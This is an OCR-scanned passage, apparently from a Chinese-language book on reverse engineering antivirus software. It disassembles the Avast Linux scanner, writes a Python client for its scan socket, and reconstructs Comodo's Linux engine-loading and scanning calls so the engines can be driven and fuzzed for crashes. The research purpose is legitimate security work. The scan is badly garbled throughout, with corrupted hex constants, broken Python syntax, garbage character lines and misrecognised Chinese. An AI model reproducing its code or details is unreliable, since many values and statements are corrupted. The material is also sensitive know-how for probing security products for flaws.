.text:08048935 mov esi, offset src ; "/var/run/avast/s 
.text:0804893A push ebx 

.text:0804893B and esp, OFFFFFFFOh 

.text:0804893E sub esp, OBO0h 

.text:08048944 mov ebx, [ebp-«argv] 

.text:08048947 mov dword ptr [esp-«28h], 0 
.text:0804894F mov dword ptr [esp-«20h], 0 
.text:08048957 mov dword ptr [esp-«24h], 0 


gv, 


rt«17 o 


can.sock" 
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.text:0804895F 

.text:0804895F loc 804895F: ; CODE XREF: main-«50 j 
.text:0804895F ; main+52 j 

.text:0804895F mov eax, [ebp-«argc] 

.text:08048962 mov dword ptr [esp«8],offset shortopts ; "hvVfpabs:e:" 
.text:0804896A mov [esp+4], ebx ; argv 

.text:0804896E mov [esp], eax ; argc 

.text:08048971 call . getopt 


.text:08048976 test eax, eax 

:08048978 js short loc, 8048989 

:0804897A sub eax, 3Ah ; Switch 61 cases 
:0804897D cmp eax, 3Ch 

:08048980 ja short loc. 804895F 


:08048982  jmp ds:off 804A5BC[eax*4] ; switch jump 

在 地 址 0x08048935 处 ， 有 一 个 被 载 人 ESI 寄 存 器 和 指向 C 字 符 串 /var/zun/avast/scan . 
sock 的 指针 。 接 着 ， 有 一 个 名 为 hvvfpabs:e: 的 字符 串 ， 调 用 了 冰 数 getopt。 这 些 是 scan 工 
具 支 持 的 对 象 ， 以 及 客户 端 工具 需要 连接 的 之 前 的 路 径 和 Unix 套 接 字 。 你 可 以 在 之 后 的 地 址 


.Cex 
Tex 
.Cex 





.Cex 
.Cex 








CE cc ct ocboct oct ct och CE CP €f oct CE CH 























0x08048B01 处 证 实 这 点 : 
.text:08048B01 lea edi, [esp-«0BCh-«socket copy] 
.text:08048B05 mov [esp+4], esi 
.text:08048B05 ; ESI points to our previously set socket's path 
.text:08048B09 mov [esp], edi ; dest 
.text:08048B0C mov [esp«18h], dl 
.text:08048B10 mov word ptr [esp-«42h], 1 
.text:08048B17 call .Sstrcpy 
.text:08048B1C mov dword ptr [esp«8], 0 ; protocol 
.text:08048B24 mov dword ptr [esp+4], SOCK STREAM ; type 
.text:08048B2C mov dword ptr [esp], AF UNIX ; domain 
.text:08048B33 call Socket 


套 接 字 路 径 的 指针 被 复制 (借助 strcpy ) 到 了 一 个 栈 变量 内 (stack_copy )。 接 着 ， 用 它 
打开 了 一 个 Unix 域 套 接 字 。 该 套 接 字 通过 connect 函 数 调用 了 scan . sock: 





.text:08048B50 mov eax, [esp-«0BCh-«socket] 
.text:08048B54 lea edx, [esp-«42h] 
.text:08048B58 mov [esp+4], edx ; addr 
.text:08048B5C mov [esp], eax : d 
.text:08048B5F neg ecx 

.text:08048B61 mov [esp+8], ecx ; len 
.text:08048B65 call .connect 
.text:08048B6A test eax, eax 














通过 上 面 的 梳理 , 现在 我 们 已 经 清楚 了 : 命令 行 扫描 客户 端 通过 套 接 字 连接 服务 器 ,然后 丫 
它 发 送 扫 描 请 求 。 下 一 广 将 阐释 扫描 客户 端 与 服务 带 的 通信 原理 。 

















2.4.2 J Linux h& Avast 编写 简单 的 Python binding 


相信 通过 上 一 节 的 学 习 ， 你 已 经 知道 Avast 的 命令 行 扫描 客户 端的 工作 流程 了 。 现 在 ， 你 将 
通过 Python 命令 提示 符 框 连 接 套 接 字 ， 验 证 之 前 的 理论 : 





^x 
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$ python 

>>> import socket 

Socket.socket(socket.AF UNIX, socket.SOCK STREAM) 
Sock name-"/var/run/avast/scan.sock" 
S.connect (sock name) 


>>> 8 = 
=>> 
>>> 


确实 可 以 成 功 连接 到 套 接 字 ! MER EET EA P mAAR a [RD R A E o 
当 连 接 调用 结束 后 ， 程 序 又 调用 了 parse_reponse 函 数 ， 其 理想 结果 是 魔术 值 220; 











.text:08048B72 mov eax, [esp-«0BCh-«socket] 
.text:08048B76 lea edx, [esp-«0BCh-«response] 
.tCext:08048B7A call parse response 
.text:08048B7F cmp eax, 220 

ik p&Wcyn. BURG APREBUOTTET : 

$ python 

>>> import socket 

>>> S = Socket.socket(socket.AF UNIX, socket.SOCK STREAM) 
>>> Sock name-z"/var/run/avast/scan.sock" 
>>> S.connect(sock name) 

>>> S.recv(1024) 


'220 DAEMON Vr An' 





谜团 解 开 了 : 之 前 的 错误 响应 码 220 是 直接 从 服务 器 应 答 的 。 你 的 Python binding 程 序 需 要 获 
取 Avast 后 台 进 程 发 送 的 欢迎 消息 ， 然 后 确认 应 答 是 否 为 220。 如 果 是 ， 那 就 意味 着 一 切 正常 。 
在 函数 main 之 后 ,程序 又 调用 函数 av_close。 下 面 是 该 部 分 的 反 汇 编 结 果 : 


























.text:08049580 av close proc near 

.text:08049580 fd - dword ptr -1Ch 

.text:08049580 buf - dword ptr -18h 

.text:08049580 n - dword ptr -14h 

.text:08049580 

.text:08049580 push ebx 

.text:08049581 mov ebx, eax 

.text:08049583 sub esp, 18h 

.text:08049586 mov [esp+1Ch+n], 5 ; n 

.text:0804958E mov [esp-1Ch«buf], offset aQuit ; "QUIT'n" 
.text:08049596 mov [esp+1Ch+fd], eax ; fd 

.text:08049599 call write 

.text:0804959E test eax, eax 

.text:080495A0 js short loc 80495C1 

.text:080495A2 

.text:080495A2 loc 80495A2: ; CODE XREF: av close-«4D 
.text:080495A2 mov [esp+1Ch+fd], ebx ; fd 

.text:080495A5 call close 

.text:080495AA test eax, eax 

.text:080495AC js short loc. 80495B3 


完成 任务 后 ,客户 端 就 会 调用 av_close 函 数 ， 发 送 字 符 串 aUIT\n 给 后 台 进 程 , 示意 自己 已 





经 完成 了 所 有 工作 ， 现 在 应 该 关闭 客户 端 连接 了 。 
现在 你 需要 使 用 Python 编 写 一 个 与 Avast 
接 。basic_avast_client1.py 包 含 了 第 一 次 要 执行 的 代码 内 容 ， 如 下 所 示 : 


























百 台 程序 通信 的 迷你 类 , 主要 是 


先 连 接 , 然后 关闭 连 
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#!/usr/bin/python 


import socket 


SOCKET_PATH = "/var/run/avast/scan.sock" 





class CBasicAvastClient: 
def _ init (self, socket name): 


self.socket name - socket name 
self.s - None 


def connect(self): 
self.s = socket.socket(socket.AF UNIX, socket.SOCK STREAM) 
self.s.connect(self.socket name) 
banner - self.s.recv(1024) 
return repr (banner) 





def close(self): 
self.s.send("QUIT An") 


def main(): 
cli - CBasicAvastClient(SOCKET PATH) 
print (cli.connect()) 
cli.close() 





试 着 运行 一 下 脚本 : 


$ python basic, avast clil.py 
'220 DAEMON\r\n' 


一 切 工作 正常 。 编 写 的 程序 成 功 连接 到 了 后 台 服 务 器 ， 接 着 又 成 功 关 闭 了 连接 。 接 下 来 , 我 
们 要 深入 探索 更 多 的 命令 ， 而 其 中 最 有 意思 的 一 个 是 : 分 析 样 本 文件 或 目录 的 命令 。 
在 地 址 0x0804083B 处 ， 有 一 次 有 趣 的 函数 调用 过 程 ， 


























.text:08048D34 mov edx, [ebx«esi*4] 
.text:08048D37 mov eax, [esp+0BCh+socket] 
.text:08048D3B call Scan path 


因为 有 部 分 调试 符号 的 帮助 ,我 们 可 以 轻而易举 地 确定 这 个 函数 的 功能 :扫描 一 个 指定 路 径 。 
ETR, ERIRE scan path: 








.text:08049F00 scan_path proc near ; CODE XREF: main+40B 
.text:08049F00 ; .text:08049EF1 
.text:08049F00 

.text:08049F00 name - dword ptr -103Ch 

.text:08049F00 resolved - dword ptr -1038h 

.text:08049F00 n - dword ptr -1034h 

.text:08049F00 var 1030 - dword ptr -1030h 

.text:08049F00 var 102C - dword ptr -102Ch 

.text:08049F00 var 1028 - dword ptr -1028h 

.text:08049F00 var 1024 - dword ptr -1024h 
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.text:08049F00 var. 1020 - dword ptr -1020h 
.text:08049F00 var 101C - byte ptr -101Ch 
.text:08049F00 var 10 - dword ptr -10h 
.text:08049F00 var C - dword ptr -0Ch 
.text:08049F00 var. 8 - dword ptr -8 
.text:08049F00 var. 4 - dword ptr -4 
.text:08049F00 
.text:08049F00 sub esp, 103Ch 
.text:08049F06 mov esp«103Ch-«resolved], 0 ; resolved 
.text:08049F0E mov esp«103Ch-«name], edx ; name 
.text:08049F11 mov esp«103Ch-«var 10], ebx 
.text:08049F18 mov ebx, eax 
.text:08049F1A mov esp«-103Ch-«var 8], edi 
.text:08049F21 mov edi, edx 
.text:08049F23 mov esp«-103Ch-«var C], esi 
.text:08049F2A mov esp«103Ch-«var 4], ebp 
.text:08049F31 mov esp«103Ch-«var. 102C], offset storage 
.text:08049F39 mov esp«103Ch-«var 1028], 1000h 
.text:08049FA1 mov esp«103Ch-«var 1024], 0 
.text:08049F49 mov esp«103Ch-«var 1020], 0 
.text:08049F51 call .realpath 
.text:08049F56 test eax, eax 
.text:08049F58 jz loc. 804A040 
.text:08049F5E 
.text:08049F5E loc, 8049F5E: ; CODE XREF: scan path«l1CE j 
.text:08049F5E mov ds:storage, 'NACS' 
.text:08049F68 mov esi, eax 
.text:08049F6A mov ds:word 804BDEA4, ' ' 











你 会 发 现 上 述 过 程 中 调用 了 realpath 函 数 (获取 文件 或 目录 的 真实 路 径 ), 同时 , 你 还 会 发 
现 4 字 节 的 字符 串 ScCAN， 紧 随 其 后 的 是 一 些 空格 。 不 必 逆 向 分 析 整 个 函数 结果 ， 也 不 必 考 虑 之 前 
为 Avast 编 写 的 Python binding 中 针对 close 方 法 执行 的 命令 格式 ， 你 会 发 现 ， 向 后 台 进 程 发 送 的 


扫描 文件 或 目录 的 命令 就 是 SCAN/s 


ome/patho 





现在 ， 在 之 前 的 代码 中 加 入 向 后 台 进 程 发 送 扫描 命令 的 代码 ， 然 后 运行 查看 结果 : 





#!/usr/bin/python 


import socket 


SOCKET_PATH = 


class CBasicAvastClient: 
Socket name): 
Socket name 


def | init (self, 
self.socket name 
self.s None 


def connect(self): 
self.s 


Socket.socket(socket.AF UNIX, 


"/var/run/avast/scan.sock" 


self.s.connect(self.socket name) 


banner 
return repr (banner) 


self.s.recv(1024) 


Socket.SOCK STREAM) 
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def close(self): 
self.s.send("QUIT An") 


def scan(self, path): 
self.s.send("SCAN $sWMn" % path) 


return repr(self.s.recv(1024)) 


def main(): 
cli = CBasicAvastClient (SOCKET PATH) 
print(cli.connect()) 
print(cli.scan("malware/xpaj")) 
cli.close() 





if name 23 main, 
main() 
脚本 的 运行 结果 如 下 : 


$ python basic, avast clil.py 
'220 DAEMONNr'n' 
'210 SCAN DATA\r\n' 


运行 上 面 的 代码 不 会 产生 有 用 的 数据 ， 因 为 你 需要 从 套 接 字 中 读 取 更 多 的 数据 包 。 指 令 210 
SCAN DATA\r\n 就 是 告诉 客户 端 ， 接 收 到 这 样 的 服务 絮 响 应 报 文 后， 需要 发 送 更 多 的 数据 包 。 
事实 上 ， 你 需要 一 直 读 取 数 据 包 ， 直 到 接收 到 200 SCAN OK\n 的 服务 器 响应 。 现 在 ， 你 需要 按 
照 下 面 的 示例 ， 修 正之 前 编写 的 Python 部 分 代码 ( 这 是 一 个 有 用 的 懒 办 法 ): 


def scan(self, path): 
self.s.send("SCAN $sWMn" $ path) 
while 1: 
ret - self.s.recv(8192) 
print (repr (ret)) 
if ret.find("200 SCAN OK") » -1: 
break 


将 代码 修改 好 以 后 , 再 运行 一 次 。 这 次 , 你 将 会 得 到 完全 不 同 的 输出 结果 , 带 有 一 个 期 望 值 : 














$ python basic, avast clil.py 

'220 DAEMON rAn' 

'210 SCAN DATA\r\n' 

'SCAN /some/path/malware/xpaj/00908235ee9e267fa2£4c83f£b4304c63af976cbcNt 

[L]0.0\t0 Win32:Hoblig\\ [Heur] \r\n’' 

'200 SCAN OK\r\n' 

None 

太 神 奇 了 1 Avast 服 务 器 的 响应 报 文中 , 将 文件 00908235ee9e267fa2f4c83fb4304c63af- 
976cbc 标 识 为 Win32 :Hobling。 MÆ, 虽然 你 的 Python binding 只 有 一 些 基 本 功能 , 但 至 少 可 以 
工作 了 ， 可 以 扫描 指定 路 径 ( 文件 或 目录 )， 然 后 获取 到 扫描 结果 。 因 此 ， 你 可 以 对 代码 做 些 调 
整 ， 基 于 文件 格式 编写 一 些 模糊 测试 工具 。 你 可 能 想 了 解 Avast Windows 版 是 不 是 也 采用 了 相同 
的 通信 协议 , 如 果 是 , 接着 将 你 刚刚 写 的 Python binding 移 植 到 Windows 平 台 上 去 。 如 果 不 能 的 话 ， 
你 肯定 想 在 Linux 平 台 上 继续 进行 模糊 测试 ， 将 GDB 或 其 他 调试 工具 绑 定 到 后 台 进 程 
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/bin/avast 上， 接着 使 用 你 编写 的 binding 向 Avast 的 病毒 查 杀 服务 嚣 发送 大 量 修改 过 的 样本 文 
件 ， 而 后 等 待 它 崩 演 。 你 要 记 住 ， 无 论 在 Windows 平 台 还 是 Linux 平 台 上 ，Avast 的 内 核 都 是 一 样 
的 (尽管 Avast 官 方 表 示 ，Linux 版 本 的 内 核 不 一 定 是 最 新 的 ) 如 果 你 在 Linux 版 本 中 遇 到 了 一 个 
月 演 ,那么 在 WIndows 平 台 上 也 存在 相同 错误 的 可 能 性 非常 大 ,一 个 影响 Avast 全 平台 版 本 的 RPM 
文件 解析 漏洞 就 是 采用 同样 的 办 法 首先 在 Linux 平 台 版 本 中 发 现 的 。 


























2.4.8 Python binding 的 最 终 版 本 


你 可 以 从 GitHub 项 目 页 面 下 载 到 Python binding 的 最 终 版 本 : https://github.com/joxeankoret/ 
pyavasto 


该 版 本 的 binding 几 乎 涵盖 了 2014 年 4 月 份 Avast 中 所 有 的 协议 特性 ， 可 谓 十 分 透彻 、 全 面 。 
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如 果 有 服务 器 的 话 , 监听 指定 端口 与 服务 器 接口 通信 的 命令 是 针对 各 类 反 病 毒 产 品 开展 自动 
化 任务 的 捷径 。 不 过 ， 并 不 是 所 有 反 病 毒 产 品 都 像 AVG 或 Avast 一 样 ， 有 类 似 的 服务 器 接口 。 在 
这 种 情况 下 ， 如 果 有 命令 行 扫描 器 与 核心 库 的 话 ， 你 需要 对 它们 展开 逆向 分 析 , 来 重建 必要 的 内 
部 结构 、 相 应 函数 及 其 原型 ， 以 便 能 够 了 解 如 何在 自动 化 测试 过 程 中 调用 这 些 函数 。 

本 案例 为 Comodo Linux 版 编写 了 一 款 非 官方 的 C/C++ 开发 工具 包 ( SDK ) 幸运 的 是 , Comodo 
Linux 版 提供 了 完整 的 调试 符号 。 因 此 ， 了 解 其 接口 、 结 构 等 会 变 得 相对 简单 。 

首先 ,让 我 们 来 分 析 Comodo Linux 版 的 命令 行 扫描 器 ( 称 作 cmdscan ), 它 的 安装 目录 如 下 : 

/opt/COMODO/cmdscan 

在 IDA 中 打开 对 应 的 二 进 制 文件 , 等 待 最 初 的 自动 分 析 结 束 , 然后 跳 转 到 函数 main。 你 将 会 
看 到 如 下 反 汇 编 结 




































































.text:00000000004015C0 ; | int64 _ fastcall main(int argc, char **argv, 
char **envp) 
.text:00000000004015C0 main proc near 
text:00000000004015C0 
text:00000000004015C0 var A0- dword ptr -0A0h 
text:00000000004015CO0 var 20-2 dword ptr -20h 
text:00000000004015CO0 var 1C- dword ptr -1Ch 
text:00000000004015C0 
text:00000000004015C0 push rbp 
text:00000000004015C1 mov ebp, edi 
text:00000000004015C3 push rbx 
text:00000000004015C4 mov rbx, rsi ; argv 
text:00000000004015C7 sub rsp, 0A8h 
text:00000000004015CE mov [rsp+0B8h+var_1C], 0 
text:00000000004015D9 mov [rsp«0OB8h-«var 20], 0 
text:00000000004015E4 
text:00000000004015EA4 loc A4015EA4: 
text:00000000004015E4 
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.text:00000000004015EA4 mov edx, offset shortopts ; "S:vh" 
.text:00000000004015E9 mov rsi, rbx ; argv 
.text:00000000004015EC mov edi, ebp ; argc 
.text:00000000004015EE call .getopt 

.text:00000000004015F3 cmp eax, OFFFFFFFFh 


这 里 ， 通 过 标准 函数 getopt 检 查 命令 行 选项 s:vh。 如 果 你 不 带 参 数 ， 直 接 运行 /opt/ 
COMODO/cmdscan 命 令 ， HH REA 是 该 命令 行 扫描 工具 的 用 法 : 


$ /opt/COMODO/cmdscan 

USAGE: /opt/COMODO/cmdscan -s [FILE] [OPTION...] 
-S: Scan a file or directory 

-v: verbose mode, display more detailed output 
-h: this help screen 


命令 行 选项 s:vh 的 反 汇 编 结 果 如 下 。 最 有 意思 的 地 方 是 -s 标 志 ， 它 规定 了 扫描 器 需要 扫描 
的 文件 或 目录 。 让 我 们 继续 反 汇 编 ， 来 了 解 这 个 标志 的 工作 原理 : 



































.text:00000000004015F8 cmp eax, 's' 
.text:00000000004015FB jz short loc, 401613 

(Secun) 

.text:0000000000401613 1oc, 401613: 

.text:0000000000401613 mov rdi, ecs:optarg ; name 
.text:000000000040161A Xor esi, esi ; type 
.text:000000000040161C call _access 
.text:0000000000401621 test eax, eax 
.text:0000000000401623 jnz loc 40172D 
.text:0000000000401629 mov rax, cs:optarg 
.text:0000000000401630 mov CS:8rC, rax ; Path to scan 
.text:0000000000401637 jmp short next cmdline option 








当 使 用 -s 后 绥 标 志 时 ， 程 序 通过 调用 access 检 查 紧 随 其 后 的 参数 是 否 为 一 个 存在 的 路 径 。 
如 果 参 数 路 径 存 在 的 话 ， 将 待 扫描 路 径 的 指针 (一 个 文件 名 或 日 录 ) 保存 为 src 静 态 变 量 ， 接 着 
继续 分 析 更 多 的 命令 行 参数 。 命 令 行 参数 解析 完毕 后 ， 就 可 以 分 析 相 关 代 码 了 : 











.text:0000000000401649 loc_401649: ; CODE XREF: main+36 j 
.text:0000000000401649 cmp cs:Src，0 

.text:0000000000401651 jz no filename specified 
.text:0000000000401657 mov edi, offset dev aflt fd ; a2 
.text:000000000040165C call open, dev. avflt 
.text:0000000000401661 call load framework 
.text:0000000000401666 call maybe IFrameWork CreateInstance 





上 述 代码 检测 了 代表 需要 扫描 路 径 的 变量 src 是 否 已 经 被 赋值 。 如 果 没 有 被 赋值 的 话 ， 将 显 
示 使 用 帮助 ， 然 后 退出 。 否 则 ， 程 序 将 调用 名 为 open_dev_avf1lt 的 函数 ， 然 后 是 lo0ad_ 
framework, iJriWuHmaybe IFramework CreateinstancePKÉ, TRA PEERS 
open_dqev_avflt， 因 为 实际 上 扫描 过 程 中 不 会 用 到 /dev/avflt 方 法 。 跳 过 函数 open_dqev_ 
avflt， 直 接 分 析 用 于 加 载 Comodo 内 核 的 郴 数 1oaq_framework。 该 函数 的 伪 代 人 码 如 下 : 


void *load framework() 


( 


int filename size; // eax@1 








32 第 2 章 逆向 工程 核心 





char *self dir; // rax@2 

int *v2; // rax@3 

char *v3; // rax@3 

void *hFramework; // rax@6 

void *CreateInstance; // raxQ7 

char *v6; // rax89 

char filename[2056]; // [sp«0h] [bp-808h]@1 


filename size = readlink("/proc/self/exe", filename, 0x800uLL); 
if ( filename size == -1 |l 
(filename[filename size] - O0, 
self dir - dirname(filename), chdir(self dir)) ) 
( 
V2 =  errno location(); 
v3 = strerror(*v2); 
LABEL 4: 
fprintf (stderr, "£sWMn", v3); 
exit(1); 
} 
hFramework = dlopen("./libFRAMEWORK.so", 1); 
hFrameworkSo - hFramework; 


if ( 1!hFramework ) 
{ 
v6 = dlerror(); 
fprintf(stderr, "error is %s\n", v6); 


goto LABEL_10; 
} 


CreateInstance = dlsym(hFramework, "CreateInstance"); 








FnCreateInstance = (int ( fastcall *) 
( QWORD, QWORD, QWORD, JQWORD))CreateInstance; 
if ( I!CreateInstance ) 
{ 
LABEL 10: 
v3 - dlerror(); 


goto LABEL 4; 
j 


return CreateInstance; 


} 

反 编 译 出 来 的 代码 看 起 来 很 棒 ， 不 是 吗 ?” 你 可 以 复制 上 述 函 数 的 伪 代 码 ， 然 后 直接 保存 成 
C/C++ 源 代码 文件 。 概 括 来 说 ， 上 面 程序 的 伪 代 码 行为 如 下 。 
a 借助 Linux 内 核 创建 的 符号 链接 /proc/self/exe, 程序 解析 了 自身 的 路 径 , 接着 将 该 路 径 设置 
为 当前 工作 目录 。 
口 程序 动态 加 载 libFRAMEWORK .so 文件 , 然后 解析 函数 createInstance， 接 着 将 指针 保 
存 到 全 局 变量 FncreateInstance 中 。 
口 ibFRAMEWORK.so 内 的 函数 createInstance 加 载 内 核 , 同时 解析 负责 创建 新 框架 实例 
的 函数 。 
接 下 来 ， 你 需要 对 困 数 maybe_IFramework_createInstance 开 展 逆向 分 析 : 


.text:0000000000401A50 maybe IFrameWork CreateInstance proc near 
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.text:0000000000401A50 

.text:0000000000401A50 hInstance- qword ptr -40h 
.text:0000000000401A50 var. 38- qword ptr -38h 
.text:0000000000401A50 maybe flags- qword ptr -28h 
.text:0000000000401A50 

.text:0000000000401A50 push rbp 
.text:0000000000401A51 XOr esi, esi 
.text:0000000000401A53 xor edi, edi 
.text:0000000000401A55 mov edx, 0F0000h 
.text:0000000000401A5A push rbx 
.text:0000000000401A5B sub rsp, 38h 
.text:0000000000401A5F mov [rsp-«48h«hInstance], 0 
.text:0000000000401A68 lea rcx, [rsp-«48h«hInstance] 
.text:0000000000401A6D call cs:FnCreateInstance 


此 处 调用 了 之 前 解析 的 函数 FncreateInstance， 同时 传递 了 一 个 名 为 hInstance 的 本 地 
变量 ,创建 了 一 个 Comodo Antivirus 的 接口 实例 。 实 例 创 建 后 ， 将 执行 如 下 伪 代 码 : 


BYTE4 (maybe flags) = 0; 
LODWORD (maybe flags) = -1; 

g FrameworkInstance - hInstance; 

cur dir = get current dir. name(); 

hFramework - g FrameworkInstance; 

cur dir len - strlen(cur dir); 

if ( hFramework-»baseclass 0-»CFrameWork Init( 





hFramework, 

cur dir len + 1, 

cur dir, 

maybe flags, OLL) < 0 ) 

( 
fwrite("IFrameWork Init failed!WMn", 1uLL, O0Ox18uLL, stderr); 
exit(1); 

} 


free(cur dir); 
上 述 代码 通过 调用 hnFramework->baseclass_0->CFrameWork_Init 初 始 化 框架 ,接收 刚 
刚 创 建 的 实例 hFzramework、 其 他 所 有 内 核 文件 的 目录 、 给 定 文件 目录 路 径 缓 冲 区 的 大 小 ， 以 及 
给 CFrameWork_Init 设 置 的 功能 标志 。 由 于 之 前 更 改 了 当前 工作 目录 ， 当 前 的 文件 目录 就 是 程 
序 cmdscan 的 真实 路 径 opVCOMODO/。 这 些 操 作 完 成 后 ， 程 序 调 用 了 更 多 的 函数 ， 以 便 能 够 正 
确 加 载 反 病毒 软件 的 内 核 : 
LODWORD (v8) = -1; 


BYTE4 (v8) = 0; 
if ( g FrameworkInstance-»baseclass 0-»CFrameWork LoadScanners( 











g. FrameworkInstance, 

v8) «0 J 

{ 
fwrite("IFrameWork LoadScanners failed!\n", luLL, 0x20uLL, stderr); 
exit(1); 

) 

if ( g FrameworkInstance-»baseclass 0-»CFrameWork CreateEngine( 

g FrameworkInstance, (IAEEngineDispatch **)&g Engine) < 0 ) 
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{ 
fwrite("IFrameWork CreateEngine failed!\n", luLL, 0x20uLL, stderr); 
exit (1); 
} 
if ( g Engine->baseclass 0->CAEEngineDispatch GetBaseComponent( 
g Engine, 
(CAECLSID)0x20001, 
(IUnknown **)&g base component 0x20001) < 0 ) 
t 
fwrite("IAEEngineDispatch GetBaseComponent failed!Wn", 
luLL, 
Ox2BuLL, stderr); 
exit(1); 
} 

上 面 的 伪 代 码 通过 调用 cFramework_Loadscanners 加 载 了 扫描 程序 。 程 序 通过 调用 
CFrameWork_CcreateEngine 创 建 了 扫描 引擎 , 同时 , 通过 调用 cAEEngineDispatch_GetBase- 
Component, 直接 加 载 了 基础 调度 模块 。 接 下 来 要 讲 的 东西 虽然 可 以 直接 略 过 , 但 我 们 最 好 还 是 
了 解 一 下 它 的 功能 : 

v4 = operator new(OxB8uLL); 

v5 - (IAEUserCallBack *)v4; 

*( QWORD *)v4 - &vtable 403310; 

pthread mutex init((pthread mutex t *) (v4 + 144), OLL); 

memset(&v5[12], 0, Ox7EuLL); 

g user callbacks - (  int64)v5; 

result = g Engine-»baseclass 0-»CAEEngineDispatch SetUserCallBack 

(g Engine, v5); 

if ( result < 0 ) 

t 
fwrite("SetUserCallBack() failed!WMn", 1luLL, OxlAuLL, stderr); 
exit(1); 

} 


上 面 这 段 代码 可 以 用 来 设置 回调 。 例 如 ,你 可 以 通过 设置 回调 ,实现 每 当 新 文件 有 打开 、 创 
建 、 读 取 、 写 入 等 操作 时 ， 就 发 出 提示 的 功能 。 你 想 借用 Comodo3 引 擎 编写 一 个 脱 壳 程序 吗 ? 其 
实 只 要 设置 一 个 通知 回调 ,等 待 其 被 调用 , 复制 临时 文件 或 缓冲 区 ， 这样 就 大 功 告 成 了 。 基 于 反 
病毒 引擎 的 通用 脱 壳 程序 很 流行 。 

相信 你 也 一 定 觉得 上 面 的 演示 很 有 趣 , 但 我 们 的 最 终 目的 是 逆向 分 析 反 病毒 软件 内 核 , 为 纺 
写 能 够 与 Comodo 内核 交 互 的 C/C++ 软件 开发 工具 包 ， 收 集 充足 的 信息 。 函 数 
maybe IFrameWork CreateInstance 目前 已 经 分 析 完 毕 , 证 我 们 回 过 头 来 分 析 函 数 main。 接 
下 来 这 部 分 代码 在 之 前 分 析 的 函数 被 调用 之 后 运行 ， 其 伪 代 码 类 似 下 面 这 样 : 


T 















































if (  1xstat(1, filename, &v7) == -1 ) 
{ 
v5 = _ errno location(); 
v6 - strerror(*v5); 


fprintf (stderr, "£s: $sWMn", filename, v6); 
} 


else 
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if ( verbose ) 

fwrite("----- -- Scan Start ------- Sn", luLL, Ox1BuLL, stdout); 
if ( (v8 & OxF000) == 0x4000 ) 

scan directory(filename, verbose, (  int64)&scanned files, 

(. int64)&virus. found); 

else 

Scan stream(filename, verbose, &scanned files, 

&virus. found); 

if ( verbose ) 

fwrite("----- -- Scan End zz----- Sn", luLL, Ox19uLL, stdout); 


fprintf(stdout, "Number of Scanned Files: %d\n", 
(unsigned int)scanned files); 

fprintf(stdout, "Number of Found Viruses: %d\n", 
(unsigned int)virus found); 


) 
上 述 代码 的 功能 是 检查 全 局 变量 src 中 存储 的 路 径 信息 是 否 存在 。 如 果 有 这 个 路 径 ， 就 会 根 
据 调 用 _1xstat 后 返回 的 功能 标志 ( flag ) ZW FH Scan directoryzXscan stream; 
用 来 扫描 目录 的 函数 为 每 个 已 发 现 的 元 素 都 调用 了 scan_stream。 现 在 ， 让 我 们 来 深入 探究 该 
函数 的 具体 行为 : 


int | fastcall scan streamQ( 

char *filename, 

char verbose, 

—DWORD *scanned files, 

.—DWORD *virus found) 

G-) 
SCANRESULT scan result; // [sp+10h] [bp-118h]81 
SCANOPTION scan, option; // [sp+90h] [bp-98h]@1 
ICAVStream *inited to zero; // [sp+E8h] [bp-40h]@1 





memset(&scan option, 0, O0x49uLL); 
memsetí(&scan result, 0, Ox7EuLL); 
scan option.ScanCfgInfo = (x1)-1; 

scan, option.bScanPackers = 1; 

scan option.bScanArchives = 1; 

scan, option.bUseHeur - 1; 

Scan option.eSHeurLevel = 2; 

base component 0x20001 - 

*(struct base component 0x20001 t **)g base comp; 
Scan option.dwMaxFileSize = 0x2800000; 

Scan option.eOwnerFlag = 1; 

inited to zero = OLL; 

result = base component, 0x20001-»pfunc50( 

base comp, 














g. 

(_ int64 *)&inited, to zero, 
(. int64)filename, 
1LL, 
31 


Lili, 








OLL); 


这 部 分 代码 非常 有 意思 。 首 先 ， 它 分 别 初始 化 了 对 象 ScANRESULT 和 对 象 ScANOPTION， 并 
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规定 了 必要 的 功能 标志 ， 比 如 是 否 要 扫描 归档 文件 ， 是否 要 启用 启发 引擎 等 。 接 着 ,代码 调用 了 
成 员 函 数 pfunc50， 向 其 传递 了 许多 参数 ， 如 基础 组 成 部 分 、 文 件 名 等 。 虽 然 我 们 不 知道 函数 
pfunc50 到 底 有 什么 用 ,但 是 也 没有 必要 去 和 弄 清楚 。 要 记 住 ， 当 前 的 任务 不 是 充分 理解 Comodo 
内 核 的 工作 原理 ， 而 是 要 弄 清楚 如 何 与 其 交互 。 接 下 来 的 代码 是 : 

err = result; 

if ( result >= 0 ) 

{ 


memset ( (void *)(g user callbacks + 12), 0, Ox7EuLL); 
err = g Engine-»baseclass 0-»CAEEngineDispatch ScanStream(g Engine, 














inited to zero, &scan option, &scan result); 
(s) 


这 部 分 代码 实际 上 是 在 实现 文件 扫描 功能 。 函 数 pfunc50 传 人 了 本 地 变量 initeg_to_ 
zero, 其 中 包括 分 析 文 件 过 程 中 需要 的 所 有 信息 。 同样, 代码 调用 了 也 数 CAEEngineDispatch_ 
ScanStream， 并 同时 声 明 WG 这 些 参 数 中 最 有 意思 的 是 SCANOPTION 和 
SCANRE 描 选 项 ， 获 取 扫 描 结果 。cAEEngineDispatch_ 
en uu qu M 但 你 可 以 跳 过 该 函数 中 使 用 了 这 些 回调 值 的 
代码 。 接 下 来 的 代码 也 很 有 意思 : 

if ( err »- 0 ) 


( 


*-*scanned files; 






































if ( verbose ) 
t 
if ( scan result.bFound ) 
( 
fprintf (stdout, "£s ---» Found Virus, Malware Name is %s\n", 
filename, scan result.szMalwareName); 
result - fflush(stdout); 
} 
else 
{ 
fprintf (stdout, "%s ---> Not Virus\n", filename); 
result = fflush (stdout); 
} 
} 
} 


上 面 这 部 分 代码 片段 检查 了 本 地 变量 srtr 是 否 不 为 0， 增 加 了 变量 scanneq_files 的 数值 ， 
同时 ， 如 果 对 象 ScaANRESULT 的 成 员 值 bFound 为 true， 则 显示 发 现 的 恶意 软件 名 称 。 该 函数 的 
最 后 一 部 分 代码 的 作用 是 ， 每 发 现 一 个 恶意 软件 ， 就 增加 已 发 现 的 病毒 数量 : 

if ( scan result.bFound ) 


( 


if ( err >= 0 














--*virus found; 


H 
让 我 们 再 次 回 到 函数 main， 调 用 因数 scan_* 后 的 最 后 一 部 分 代码 为 : 
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uninit_framework(); 
dlclose framework(); 
close dev aflt fd(&dev aflt fd); 


上 面 这 段 代 码 与 清理 工作 有 关 。 反 初始 化 框架 的 同时 ， 取 消 所 有 正在 进行 的 扫描 工作 : 


g base component, 0x20001 = OLL; 
if ( g Engine ) 
{ 
